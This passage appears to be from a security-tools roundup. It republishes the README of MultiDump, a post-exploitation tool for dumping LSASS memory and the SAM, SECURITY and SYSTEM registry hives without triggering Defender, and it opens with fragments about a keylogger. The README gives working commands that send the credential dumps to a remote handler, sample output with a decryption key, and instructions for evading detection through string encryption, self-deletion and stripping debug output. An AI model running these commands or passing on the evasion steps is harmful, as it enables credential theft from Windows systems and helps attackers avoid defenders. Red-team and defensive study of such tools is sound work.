        The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like cat, you should select the appropriate option to print ASCII control characters, such as -v for cat, or open it in a text-editor.

        Non-Interactive Shells

        The keylogger relies on script, so the keylogger won't run in non-interactive shells.

        Windows

        Repeated Requests

        For some reason, the Windows Dns_Query_A always sends duplicate requests. The server will process it fine because it discards repeated packets.



        MultiDump - Post-Exploitation Tool For Dumping And Extracting LSASS Memory Discreetly

        By: Zion3R


        MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.

        Blog post: https://xre0us.io/posts/multidump


        MultiDump supports LSASS dumping via ProcDump.exe or comsvcs.dll. It offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.

        Usage

         __  __       _ _   _ ____
        |  \/  |_   _| | |_(_)  _ \ _   _ _ __ ___  _ __
        | |\/| | | | | | __| | | | | | | | '_ ` _ \| '_ \
        | |  | | |_| | | |_| | |_| | |_| | | | | | | |_) |
        |_|  |_|\__,_|_|\__|_|____/ \__,_|_| |_| |_| .__/
                                                   |_|

        Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]

        -p Path to save procdump.exe, use full path. Default to temp directory
        -l Path to save encrypted dump file, use full path. Default to current directory
        -r Set ip:port to connect to a remote handler
        --procdump Writes procdump to disk and use it to dump LSASS
        --nodump Disable LSASS dumping
        --reg Dump SAM, SECURITY and SYSTEM hives
        --delay Increase the interval between connections, for slower network speeds
        -v Enable verbose mode

        MultiDump defaults to local mode using comsvcs.dll and saves the encrypted dump in the current directory.
        Examples:
        MultiDump.exe -l C:\Users\Public\lsass.dmp -v
        MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000
        usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]

        Handler for RemoteProcDump

        options:
        -h, --help show this help message and exit
        -r REMOTE, --remote REMOTE
        Port to receive remote dump file
        -l LOCAL, --local LOCAL
        Local dump file, key needed to decrypt
        --sam SAM Local SAM save, key needed to decrypt
        --security SECURITY Local SECURITY save, key needed to decrypt
        --system SYSTEM Local SYSTEM save, key needed to decrypt
        -k KEY, --key KEY Key to decrypt local file
        --override-ip OVERRIDE_IP
        Manually specify the IP address for key generation in remote mode, for proxied connection

        As with all LSASS-related tools, Administrator privileges/SeDebugPrivilege are required.

        The handler depends on Pypykatz to parse the LSASS dump and on impacket to parse the registry saves. They should be installed in your environment. If you see the error All detection methods failed, the Pypykatz version is likely outdated.

        By default, MultiDump uses the comsvcs.dll method and saves the encrypted dump in the current directory.

        MultiDump.exe
        ...
        [i] Local Mode Selected. Writing Encrypted Dump File to Disk...
        [i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.
        [i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
        ./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e

        If --procdump is used, ProcDump.exe will be written to disk to dump LSASS.

        In remote mode, MultiDump connects to the handler's listener.

        ./ProcDumpHandler.py -r 9001
        [i] Listening on port 9001 for encrypted key...
        MultiDump.exe -r 10.0.0.1:9001

        The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r.
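        The idea of binding key material to an expected endpoint can be sketched as follows. This is a hypothetical illustration only, NOT MultiDump's actual key-derivation scheme (which is internal to the tool); it just shows why both sides must agree on the same ip:port string for decryption to succeed, and where --override-ip fits in:

```python
import hashlib

def bind_key(secret: bytes, ip: str, port: int) -> bytes:
    # Mix the endpoint into the key so decryption only works when
    # both sides derive from the same ip:port.
    return hashlib.sha256(secret + f"{ip}:{port}".encode()).digest()

client_key = bind_key(b"session-secret", "10.0.0.1", 9001)
# A handler behind a proxy would pass --override-ip 10.0.0.1 so its
# derivation input matches what the client used:
handler_key = bind_key(b"session-secret", "10.0.0.1", 9001)
assert client_key == handler_key
```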

        An additional option to dump the SAM, SECURITY and SYSTEM hives is available with --reg; the decryption process is the same as for LSASS dumps. This is more of a convenience feature to make post-exploitation information gathering easier.

        Building MultiDump

        Open in Visual Studio, build in Release mode.

        Customising MultiDump

        It is recommended to customise the binary before compiling, for example by changing the static strings or the RC4 key used to encrypt them. To do so, another Visual Studio project, EncryptionHelper, is included. Simply change the key or strings, and the output of the compiled EncryptionHelper.exe can be pasted into MultiDump.c and Common.h.

        Self deletion can be toggled by uncommenting the following line in Common.h:

        #define SELF_DELETION

        To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in Debug.h:

        //#define DEBUG

        MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of); the investigation and implementation deserve a blog post of their own: https://xre0us.io/posts/saving-lsass-from-defender/

        Credits


